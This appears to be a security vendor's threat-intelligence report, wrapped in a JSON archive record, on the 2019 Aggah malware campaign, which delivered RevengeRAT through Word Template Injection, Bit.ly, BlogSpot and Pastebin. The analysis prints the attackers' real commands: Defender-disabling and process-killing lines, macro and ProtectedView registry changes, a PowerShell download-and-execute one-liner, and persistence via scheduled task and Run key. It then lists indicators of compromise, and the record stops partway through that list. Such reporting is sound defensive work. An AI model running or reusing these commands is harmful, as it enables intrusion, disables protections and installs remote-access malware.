{
	"id": "7165d99d-732d-406d-84d9-0ac6a7567b94",
	"created_at": "2026-04-06T00:08:38.047057Z",
	"updated_at": "2026-04-10T03:35:56.640211Z",
	"deleted_at": null,
	"sha1_hash": "d983112a3f954a98d504b21b89afdc1b40f17703",
	"title": "Aggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2473291,
	"plain_text": "Aggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large\r\nScale Campaign\r\nBy Robert Falcone, Brittany Barbehenn\r\nPublished: 2019-04-17 · Archived: 2026-04-02 11:40:15 UTC\r\nExecutive Summary\r\nIn March 2019, Unit 42 began looking into an attack campaign that appeared to be primarily focused on organizations\r\nwithin a Middle Eastern country. Further analysis revealed that this activity is likely part of a much larger campaign\r\nimpacting not only that region but also the United States, and throughout Europe and Asia.\r\nOur analysis of the delivery document revealed it was built to load a malicious macro-enabled document from a remote\r\nserver via Template Injection. These macros use BlogSpot posts to obtain a script that uses multiple Pastebin pastes to\r\ndownload additional scripts, which ultimately result in the final payload being RevengeRAT configured with a duckdns[.]org\r\ndomain for C2. During our research, we found several related delivery documents that followed the same process to\r\nultimately install RevengeRAT hosted on Pastebin, which suggests the actors used these TTPs throughout their attack\r\ncampaign.\r\nInitially, we believed this activity to be potentially associated with the Gorgon Group. Our hypothesis was based on the high\r\nlevel TTPs including the use of RevengeRAT. However, Unit 42 has not yet identified direct overlaps with other high-fidelity Gorgon Group indicators. 
Based on this, we are not able to assign this activity to the Gorgon Group with an\r\nappropriate level of certainty.\r\nIn light of that, Unit 42 refers to the activity described in this blog as the Aggah Campaign based on the actor’s alias\r\n“hagga”, which was used to split data sent to the RevengeRAT C2 server and was the name of one of the Pastebin accounts\r\nused to host the RevengeRAT payloads.\r\nThe Delivery\r\nOur research into the Aggah campaign began with a delivery document sent to organizations in a single Middle Eastern\r\ncountry via an email on March 27, 2019. This email appeared to originate from a large financial institution in the same\r\ncountry, although it was likely spoofed. The subject of the email was “Your account is locked.” This initial delivery\r\ndocument was sent to organizations in one Middle Eastern country, specifically to organizations in the education,\r\nmedia/marketing, and government verticals. Four days later, on March 31, we saw the same delivery email sent to a financial\r\norganization in a second Middle Eastern country. We later discovered that this delivery document was just one of many in a\r\nlarger campaign sent to organizations in the United States, Europe and Asia targeting the same verticals as in the Middle\r\nEast as well as Technology, Retail, Manufacturing, State/Local Government, Hospitality, Medical, and other\r\nprofessional businesses. The related documents were functionally similar, so we will describe the original sample we\r\nanalyzed.\r\nThe email sent on March 27 had a Word document attached with the filename “Activity.doc” (SHA256:\r\nd7c92a8aa03478155de6813c35e84727ac9d383e27ba751d833e5efba3d77946) that attempted to load a remote OLE\r\ndocument via Template Injection. When “Activity.doc” is opened, it displays the image in Figure 1 as a lure in an attempt to\r\ntrick the user into enabling content to allow macros to run. 
The lure suggests that the user must open the document in the\r\ndesktop versions of Microsoft Word, as macros do not function in the online version of Word in Office 365. The\r\n“Activity.doc” file does not contain a macro, but the OLE document that it loads from the remote server does contain a\r\nmacro.\r\nhttps://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/\r\nPage 1 of 18\n\nFigure 1. Lure image used in Activity.doc to trick the user into enabling macros\r\nActivity.doc Analysis\r\nThe delivery document uses Template Injection to load a file hosted on a remote server. Figure 2 shows the contents of the\r\ndelivery document’s footer that attempts to load a remote OLE document\r\nfrom hxxps://static.wixstatic[.]com/ugd/05e470_b104c366c1f7423293887062c7354db2.doc:\r\nFigure 2. Footer in Activity.doc showing remote OLE location\r\nThe remote OLE file loaded by the footer of Activity.doc is actually an RTF file (SHA256:\r\n5f762589cdb8955308db4bba140129f172bf2dbc1e979137b6cc7949f7b19e6f) that loads an embedded Excel document with\r\na heavily obfuscated macro that contains a significant amount of ‘junk’ code. The purpose of this macro is to decode the\r\nfollowing command and execute it via the \"Shell\" command:\r\nmshta hxxp://www.bitly[.]com/SmexEaldos3\r\nThe command above uses the built-in “mshta” application to download the contents of the URL provided, in this case a\r\nshortened URL using the Bit.ly service. During WildFire's analysis, the shortened Bit.ly URL redirected to\r\nhxxps://bjm9.blogspot[.]com/p/si.html, as seen in the “Location” field of the HTTP response in Figure 3.\r\nFigure 3. Bit.ly shortened link pointing to blog hosted at Blogspot\r\nAs you can see in the GET request above, the redirect points the browser (“mshta.exe” in this case) to a blog hosted on\r\nblogspot[.]com. 
As you can see in Figure 4, this BlogSpot article appears a bit odd but not necessarily malicious.\r\nFigure 4. bjm9.blogspot[.]com screen capture\r\nBy analyzing the code hosted on the blog, we discovered that it includes embedded JavaScript that performs\r\nseveral activities. Figure 5 shows the malicious JavaScript hosted at the seemingly innocuous blog.\r\nFigure 5. Script embedded in bjm9 Blogspot article\r\nThe malicious script carries out several activities on the compromised system. First, it attempts to hamper Microsoft\r\nDefender by removing its signature set. The script also kills the Defender process along with the processes for several Office\r\napplications. All of this is performed using the following command line:\r\ncmd.exe /c cd \"\"%ProgramFiles%\\Windows Defender\"\" \u0026 MpCmdRun.exe -removedefinitions -dynamicsignatures \u0026\r\ntaskkill /f /im winword.exe \u0026 taskkill /f /im excel.exe \u0026 taskkill /f /im MSPUB.exe \u0026 taskkill /f /im POWERPNT.EXE \u0026\r\nforfiles /c \"\"taskkill /f /im MSASCuiL.exe\"\" \u0026 forfiles /c \"\"taskkill /f /im MpCmdRun.exe\"\" \u0026 exit\r\nThe script then attempts to disable security mechanisms within Office products, specifically by setting registry key values to\r\nenable macros and to disable ProtectedView. 
First, the script enables macros within Word, PowerPoint and Excel by setting\r\nthe following registry keys to a value of \"1\":\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\PowerPoint\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\PowerPoint\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\PowerPoint\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\PowerPoint\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\PowerPoint\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\Excel\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\Excel\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\Excel\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\Excel\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\VBAWarnings\r\nThe script then attempts to disable the ProtectedView security mechanism within Word, PowerPoint and Excel by setting the\r\nfollowing registry keys to a value of 
“1”:\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\PowerPoint\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\PowerPoint\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\PowerPoint\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\Excel\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\Excel\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\Excel\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\PowerPoint\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\PowerPoint\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\PowerPoint\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\Excel\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\Excel\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\Excel\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\So
ftware\\Microsoft\\Office\\14.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\PowerPoint\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\PowerPoint\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\PowerPoint\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\Excel\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\Excel\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\Excel\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\PowerPoint\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\PowerPoint\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\PowerPoint\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\Excel\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\Excel\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\Excel\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\Pro
tectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\PowerPoint\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\PowerPoint\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\PowerPoint\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nThe technique of enabling macros and disabling ProtectedView in Office, including the order in which the registry keys\r\nwere modified, was also described in our blog covering the Gorgon Group. The tactic of killing processes for Windows\r\nDefender and Microsoft Office applications was also carried out by Gorgon. The Gorgon Group also used the Bit.ly\r\nURL shortening service in their attacks, but while these are obvious technique overlaps, we still do not have concrete\r\nevidence that this attack campaign is associated with Gorgon.\r\nThe script hosted on Blogspot then carries out three main activities:\r\n1. Downloading a payload from a Pastebin URL\r\n2. Creating a scheduled task to periodically obtain and run a script from a Pastebin URL\r\n3. Creating an autorun registry key to obtain and run a script from a Pastebin URL\r\nObtaining a payload from Pastebin\r\nThe script hosted at Blogspot obtains a portable executable payload from a Pastebin URL and executes it. 
The script builds\r\nthe following command and attempts to run it using the WScript.Shell object:\r\nmshta.exe vbscript:CreateObject(\"\"Wscript.Shell\"\").Run(\"\"powershell.exe -noexit -command\r\n[Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object\r\nNet.WebClient).DownloadString(\\'h\\'+\\'t\\'+\\'t\\'+\\'p\\'+\\'s:\\'+\\'//p\\'+\\'a\\'+\\'s\\'+\\'t\\'+\\'e\\'+\\'b\\'+\\'i\\'+\\'n\\'+\\'.\\'+\\'c\\'+\\'o\\'+\\'m\\'+\\'/\\'+\\'r\\'+\\'a\\'+\\'w\\'+\\'/\\'+\\'2LDaeHE1\\'\r\n(window.close)\r\nThe command above downloads a base64-encoded portable executable hosted on Pastebin at\r\nhttps://pastebin[.]com/raw/2LDaeHE1, decodes the base64 downloaded from the URL, and then executes it by loading it as a .NET assembly. Figure 6\r\nshows the Pastebin page hosting the executable downloaded by the script.\r\nFigure 6. 2LDaeHE1 Pastebin page\r\nThe decoded payload has the following attributes:\r\nSHA256 b9b67c885200f90eaf9c4911b3a7f5e6707bcb51d1b892df1bde11013a60f6b5\r\nCompile Time 2019-03-20 19:43:08\r\nTable 2. Decoded payload from pastebin[.]com/raw/2LDaeHE1\r\nThis payload was written in VB.NET and named \"Nuclear Explosion,\" which is a variant of RevengeRAT configured to use\r\nthe domain \"lulla.duckdns[.]org\" for C2, as seen in Figure 7.\r\nFigure 7. RevengeRAT configuration\r\nAccording to its configuration seen in Figure 8, when sending data to the C2 server, it will split the information using the\r\nstring \"hagga\", which is the same name as the Pastebin account hosting the payload information seen in Figure 6 and the\r\nbasis of the Aggah campaign name.\r\nFigure 8. 
Configuration showing the string \"hagga\" used to split information sent to the C2 server\r\nCreating a Scheduled Task\r\nThe script hosted at the Blogspot blog builds another command to create a scheduled task called \"eScan Backup\" that runs\r\nevery 100 minutes. The command string generated by the script used to create this scheduled task is:\r\nschtasks /create /sc MINUTE /mo 100 /tn eScan Backup /tr \"\"mshta\r\nvbscript:CreateObject(\"\"Wscript.Shell\"\").Run(\"\"mshta.exe https://pastebin[.]com/raw/tb5gHu2G\"\",0,true)(window.close)\"\"\r\n/F '\r\nThe “eScan Backup” task will use the built-in mshta application to download a script from a Pastebin URL, specifically\r\nhxxps://pastebin[.]com/raw/tb5gHu2G, which we will continue to refer to as the tb5gHu2G script. We believe the actors chose\r\nthe name “eScan Backup” to appear related to the eScan antivirus products. Figure 9 shows the scheduled task in Windows’\r\nTask Scheduler program.\r\nFigure 9. Scheduled task created to reach out to Pastebin URL and run the hosted script every 100 minutes\r\nThe scheduled task downloading and running the tb5gHu2G script is meant for persistence, as it runs the same command to\r\nhamper Windows Defender and kill Office applications. The tb5gHu2G script also attempts to run the same VBScript as the\r\nscript hosted on the Blogspot blog, which downloads and executes the payload from the “2LDaeHE1” Pastebin page\r\nshown in Figure 6. Figure 10 shows the Pastebin page hosting the tb5gHu2G script.\r\nFigure 10. tb5gHu2G Pastebin page\r\nCreating an Autorun Registry Key\r\nThe script hosted at the Blogspot blog creates an autorun registry key, which appears to be a second persistence mechanism\r\nto supplement the previously mentioned scheduled task. 
To create the autorun key, the script generates the following\r\ncommand that it will attempt to run:\r\nCreateObject(\"Wscript.Shell\").regwrite \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\MicrosoftUpdate\",\r\n\"C:\\Windows\\System32\\mshta.exe\r\nvbscript:CreateObject(\"\"Wscript.Shell\"\").Run(\"\"mshta.exe%20http://pastebin[.]com/raw/YYZq1XR0\"\",0,true)\r\n(window.close)\" , \"REG_EXPAND_SZ\"\r\nThis run key will attempt to download the contents hosted at yet another Pastebin URL,\r\nhttp://pastebin[.]com/raw/YYZq1XR0,\r\nand run the contents as a script using the Wscript.Shell object. Figure 11 shows the Pastebin page displaying the contents of\r\nthe script.\r\nFigure 11. YYZq1XR0 Pastebin page\r\nThe YYZq1XR0 Pastebin paste contains the following script, which does very little:\r\n\u003cscript language=\"VBScript\"\u003e\r\nself.close\r\n\u003c/script\u003e\r\nThe fact that the above script does so little suggests that the actor may update this paste with a new script containing\r\nadditional functionality when desired. The editing of pastes is possible if the paste was created using a \"Pro\" account. These\r\npastes were created by an account named HAGGA, which appears to be a PRO account that would allow the actor to update\r\nthe script to run on infected systems. HAGGA has several additional pastes as well, as seen below in Figure 12. These pastes\r\ncontain additional malicious scripts that are ultimately used to create a payload.\r\nFigure 12. Hagga’s Pastebin page\r\nPart of a Larger Campaign?\r\nWhile investigating this particular campaign we reviewed the click count available on Bit.ly. As of April 11, 2019, the Bit.ly\r\nlink, SmexEaldos3, referenced in the analysis above had received over 1,900 clicks in about 20 countries spanning North\r\nAmerica, Europe, Asia, and the Middle East. 
This high click count indicated to us that we were likely only looking\r\nat an extremely small subset of the actual campaign. It is also highly likely that these click counts include individuals\r\naccessing the shortened link during investigations and research efforts; therefore, the number is not an accurate\r\nrepresentation of the number of hosts infected.\r\nFigure 13. Bit.ly SmexEaldos3 page clicks\r\nDigging in a bit further, we took a look at the document properties to see what additional information we may be able to use\r\nto help identify related activity. The document properties indicate these operators were using an apparently pirated version\r\nof Microsoft Word and used the string ‘Lulli moti myri’ as the creator/author of the document. Using this string we searched\r\nin our repositories and identified over a dozen Microsoft Office documents - half of them DOCX and the other half XLS.\r\nAll of the documents have a time stamp between January and April 2019, and each contained a Bit.ly URL that redirects to a\r\nBlogspot page. While all of these documents were of interest to us, we noticed one configured with the same Bit.ly URL as\r\nour original file Activity.doc. This file has the following SHA256:\r\nSHA256 ef837119fc241e8fde85f36f4635a71f6b87aecf39dc979961be914f48c4ef4c\r\nTable 3. Similarly configured document to Activity.doc\r\nDuring our analysis, we identified several Bit.ly URLs and their redirects resulting in the download of RevengeRAT. One\r\nparticular sample contains the C2 domain kronozzz2.duckdns[.]org. This sample has a SHA256 of:\r\nSHA256 c365b15cb567da7e9c04dffa0de1cb2b8104d5fe668c17691d8c68380bcd6d30\r\nTable 4. Decoded payload from pastebin[.]com/raw/sgawvit9\r\nOne of HAGGA’s pastes includes the title ‘kronoz2 back2new’. 
This domain indicated to us another possible relation to the\r\nHAGGA Pastebin account shown in Figure 12. Open source research revealed a similar domain kronoz.duckdns[.]org\r\nassociated with a RevengeRAT sample with the following hash:\r\nSHA256 fa5500a45e98e084b489301fd109676a4d8b0d3b39df4d9e2288569e232a9401\r\nTable 5. File associated with kronoz.duckdns[.]org\r\nAll identified samples are available in Appendix A.\r\nAfter reviewing all of the delivery documents and RevengeRAT payloads we discovered that all but one payload contains\r\nthe mutex RV_MUTEX-WindowsUpdateSysten32 (note the purposeful misspelling by the attackers of “Systen32” for\r\n“System32”) with a base64 encoded identifier of SE9URUlTIE5PVk9T that decodes to HOTEIS NOVOS (“NEW\r\nHOTELS” in Portuguese). We searched through our available repositories to see just how many samples contained these\r\nstrings. We found over 50 files beginning as early as September 2018, which are noted in Appendix A. Many of these\r\nsamples contained the same ‘hagga’ key; however, we also noted three other additional keys: ‘oldman’, ‘steve’, and\r\n‘roma225’. The ‘roma225’ key was discussed in December 2018 in a publication titled ‘The Enigmatic “Roma225”\r\nCampaign’ by Yoroi. The one sample that was not configured with that mutex and identifier was the sample noted in Table 5.\r\nThat sample contains the mutex RV_MUTEX-cuiGGjjtnxDpnF and the Identifier TWlsZWdvbmE= which decodes to\r\n‘Milegona’.\r\nCorrelating RevengeRAT samples\r\nRevengeRAT is a commodity Trojan that has many leaked builders freely available in open source, which makes attributing\r\nthe tool’s use to a specific actor or attack campaign difficult. Because of this, we wanted to determine whether the mutex, identifier\r\nand key seen in Aggah-related samples were non-default values for RevengeRAT and whether they were strong enough to\r\nuse for pivoting and correlation purposes. 
To gauge the likelihood of two unrelated actors using the same values in the\r\nconfiguration, we used the leaked RevengeRAT builder (v0.3) to visualize the process an actor would have to take to create\r\nRevengeRAT samples that shared the same mutex, identifier and key as the payload delivered in the Aggah campaign.\r\nTo our surprise, we found it was rather unlikely that two unrelated individuals would use the mutex, identifier, and key just\r\nby happenstance. We believe this as the actor must manually enter the mutex, identifier, and key into specific fields within\r\nthe RevengeRAT builder, which we will highlight in the following explanation of the steps required to build the Trojan.\r\nTo create the RevengeRAT payload used in this campaign, the actor would use the RevengeRAT server to compile an\r\nexecutable configured with the appropriate fields. First, the actor would set the “Socket Key” field to “hagga” and press\r\n“Start Listening”, as seen in Figure 14.\r\nFigure 14. RevengeRAT Builder Socket Key Setting\r\nOnce the server is configured and listening, the actor would click the “Client Builder” button to create the RevengeRAT\r\nclient, as seen in Figure 15.\r\nFigure 15. RevengeRAT Client Builder\r\nIn the Client Builder, the actor would click the “Network Settings” drop-down and enter the domain “lulla.duckdns[.]org”\r\nand the TCP port of 2336 before pressing the add button seen in Figure 16.\r\nFigure 16. RevengeRAT Network Settings setup\r\nThe actor would then click the Basic Settings drop-down and enter their chosen identifier “HOTEIS NOVOS” into the\r\n“Client Identifier” field and would add “-WindowsUpdateSysten32” in the “Client Mutex” field, as it already contains\r\n“RV_MUTEX” by default. Figure 17 shows these values added to the correct fields. 
Of interest here is that\r\nthe actor manually added the string “-WindowsUpdateSysten32” instead of clicking the plus (“+”) button available next to\r\nthis field, which would concatenate a hyphen and a random string instead.\r\nFigure 17. RevengeRAT Basic Settings setup\r\nLastly, to compile the payload the actor has to agree to the Terms of Service and click the “Compile” button, as seen in\r\nFigure 18.\r\nFigure 18. RevengeRAT Ready to compile\r\nBy pressing the compile button, the RevengeRAT server will create a client executable with a default name of “Client.exe”\r\nthat the actor can save to the system prior to delivering it in their attack. Figure 19 shows the RevengeRAT client icon on the\r\ndesktop.\r\nFigure 19. RevengeRAT Client Icon\r\nThe configuration within the compiled “Client.exe” seen in Figures 16 and 17 visually matches the configuration of the\r\nRevengeRAT downloaded from Pastebin in the Aggah campaign, as seen in Figures 7 and 8. This suggests that the actor(s)\r\ninvolved in this campaign would have followed similar steps to create their payload. The sequence of steps carried out to\r\ncreate RevengeRAT payloads that share the same client identifiers and socket keys suggests with high confidence that a\r\ncommon actor is involved.\r\nConclusion\r\nInitially, according to our telemetry it appeared as though this could be a very focused effort to target organizations within\r\none Middle Eastern country. 
However, after further analysis this appears to be just a small part of a much larger campaign\r\nwhich also seems to be affecting many regions including but not limited to the United States, Europe, and Asia.\r\nUnfortunately, our current data set does not afford insight into the attackers’ motivation other than to compromise a large\r\nnumber of victims.\r\nWhile a lot of this activity behaviorally appears to be potentially related to the Gorgon Group’s criminal activity, it is\r\ncurrently unclear and requires additional analysis to prove. Both Unit 42 and Yoroi recently released similar blogs which\r\nalso displayed similar tactics but were not assessed with a high level of confidence as related to the Gorgon Group. Although\r\nwe are unsure of a connection to the Gorgon Group specifically, we do assess, based on the unique configuration of these\r\nRevengeRAT samples, that a common operator was likely involved in the activity mentioned in this blog.\r\nRevengeRAT is a publicly available RAT which is seen in high volume. It appears as though some users of this RAT have\r\nmoved from following publicly available step-by-step guides to become a little more sophisticated in how they are\r\nleveraging alternative storage locations for C2 support, such as Pastebin. These technique changes may help the operators by\r\nhiding behind legitimate services that are likely not blocked by security devices.\r\nPalo Alto Networks customers are protected from these operators in the following ways:\r\nAutoFocus: Customers can currently track this campaign activity using the following tags: Aggah, RevengeRAT\r\nWildFire and Traps: detect all malware supported in this report as malicious\r\nPalo Alto Networks has shared our findings, including file samples and indicators of compromise, in this report with our\r\nfellow Cyber Threat Alliance members. 
CTA members use this intelligence to rapidly deploy protections to their customers\r\nand to systematically disrupt malicious cyber actors. For more information on the Cyber Threat Alliance, visit\r\nwww.cyberthreatalliance.org.\r\nAppendix A:\r\nIndicators of Compromise\r\nMalicious Documents and Payloads\r\n
40202af886402da\r\n08883b4d7081d51bb9d9429f856c7c4c95f47a22f38aeb48b7772635d718c7ca\r\n12a7ac8838681a95339e24683c0c8e6410a040a8a8ce5fe72bc175b724cb0aa9\r\nDownload URLs\r\nwww.bitly[.]com/nliasjdASd1\r\nwww.bitly[.]com/nliasjdASd2\r\nwww.bitly[.]com/nliasjdASd3\r\nwww.bitly[.]com/nliasjdASd4\r\nwww.bitly[.]com/nliasjdASd5\r\nwww.bitly[.]com/nliasjdASd6\r\nwww.bitly[.]com/nliasjdASd7\r\nwww.bitly[.]com/nliasjdASd8\r\nwww.bitly[.]com/nliasjdASd9\r\nwww.bitly[.]com/nliasjdASd11\r\nwww.bitly[.]com/nliasjdASd12\r\nwww.bitly[.]com/nliasjdASd13\r\nwww.bitly[.]com/SexoPhone1\r\nwww.bitly[.]com/SexoPhone2\r\nwww.bitly[.]com/SexoPhone4\r\nwww.bitly[.]com/SmexEaldos1\r\nwww.bitly[.]com/SmexEaldos2\r\nwww.bitly[.]com/SmexEaldos3\r\nhttps://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/\r\nPage 14 of 18\n\nhttp://bitly[.]com/SmexEaldos4\r\nwww.bitly[.]com/SmexEaldos5\r\nwww.bitly[.]com/SmexEaldos6\r\nwww.bitly[.]com/SmexEaldos7\r\nwww.bitly[.]com/SmexEaldos8\r\nwww.bitly[.]com/SmexEaldos9\r\nwww.bitly[.]com/SmexEaldos10\r\nwww.bitly[.]com/XAMSeWaWz\r\nwww.bitly[.]com/CAEanwQA\r\nwww.bitly[.]com/MinPoXAsUKx\r\nwww.bitly[.]com/MinPoXAs\r\nhttp:/bitly[.]com/chutter1\r\nwww.bitly[.]com/doc201901000791\r\nwww.bitly[.]com/doc201901000793\r\nwww.bitly[.]com/ASDAWnZqWas\r\nUnit 42 - Latest Cyber Security Research | Palo Alto Networks\r\nemawattttson.blogspot[.]com\r\nUnit 42 - Latest Cyber Security Research | Palo Alto Networks\r\nUnit 42 - Latest Cyber Security Research | Palo Alto Networks\r\nUnit 42 - Latest Cyber Security Research | Palo Alto Networks\r\nhttps://pastebin[.]com/raw/2LDaeHE1\r\nhttp://pastebin[.]com/raw/YYZq1XR0\r\nhttps://pastebin[.]com/raw/tb5gHu2G\r\nhttp://pastebin[.]com/raw/0c9cC2iM\r\nhttp://pastebin[.]com/raw/sgawvit9\r\nThe following indicators were identified associated with RevengeRAT, however, may not be exclusive to 
RevengeRAT\r\nfrankmana.duckdns[.]org\r\nworkfine11.duckdns[.]org\r\noldmandnsch.duckdns[.]org\r\noldmandnsch.duckdns[.]org\r\nblackhagga.duckdns[.]org\r\nskyrocket1.duckdns[.]org\r\nskyrocket1.duckdns[.]org\r\nkronoz.duckdns[.]org\r\noldmandnsch.duckdns[.]org\r\nkronozzz2.duckdns[.]org\r\nlulla.duckdns[.]org\r\ndecent.myvnc[.]com\r\ndecent5.myvnc[.]com\r\nhttps://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/\r\nPage 15 of 18\n\njayztools1.ddns[.]net\r\njayztools2.ddns[.]net\r\njayztools3.ddns[.]net\r\ntotallol.duckdns[.]org\r\ntotallol1.duckdns[.]org\r\ntotallol2.duckdns[.]org\r\ntotallol3.duckdns[.]org\r\ndecent2.myvnc[.]com\r\ndecent3.myvnc[.]com\r\ndecent1.myvnc[.]com\r\ndecent4.myvnc[.]com\r\njordanchen736.sytes[.]net\r\njordanchen7361.sytes[.]net\r\njordanchen7362.sytes[.]net\r\njordanchen7363.sytes[.]net\r\nlalacious1.serveftp[.]com\r\nlalacious2.serveftp[.]com\r\nlalacious3.serveftp[.]com\r\nlalacious4.serveftp[.]com\r\nmastermana1.serveirc[.]com\r\nmastermana2.serveirc[.]com\r\nmastermana3.serveirc[.]com\r\nmastermana4.serveirc[.]com\r\nmastermana5.serveirc[.]com\r\nlullikhao.ddns[.]net\r\nlullikhao1.ddns[.]net\r\nlullikhao2.ddns[.]net\r\nbullol.duckdns[.]org\r\ncocomo.ddns[.]net\r\nhaggasinger2.ddns[.]net\r\nhaggasinger.ddns[.]net\r\nhaggasinger1.ddns[.]net\r\nloramer1.ddnsking[.]com\r\neasykill.servebeer[.]com\r\neasykill3.servebeer[.]com\r\neasykill2.servepics[.]com\r\neasykill1.servepics[.]com\r\neasykill3.servepics[.]com\r\nhelloweenhagga.ddns[.]net\r\nhttps://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/\r\nPage 16 of 
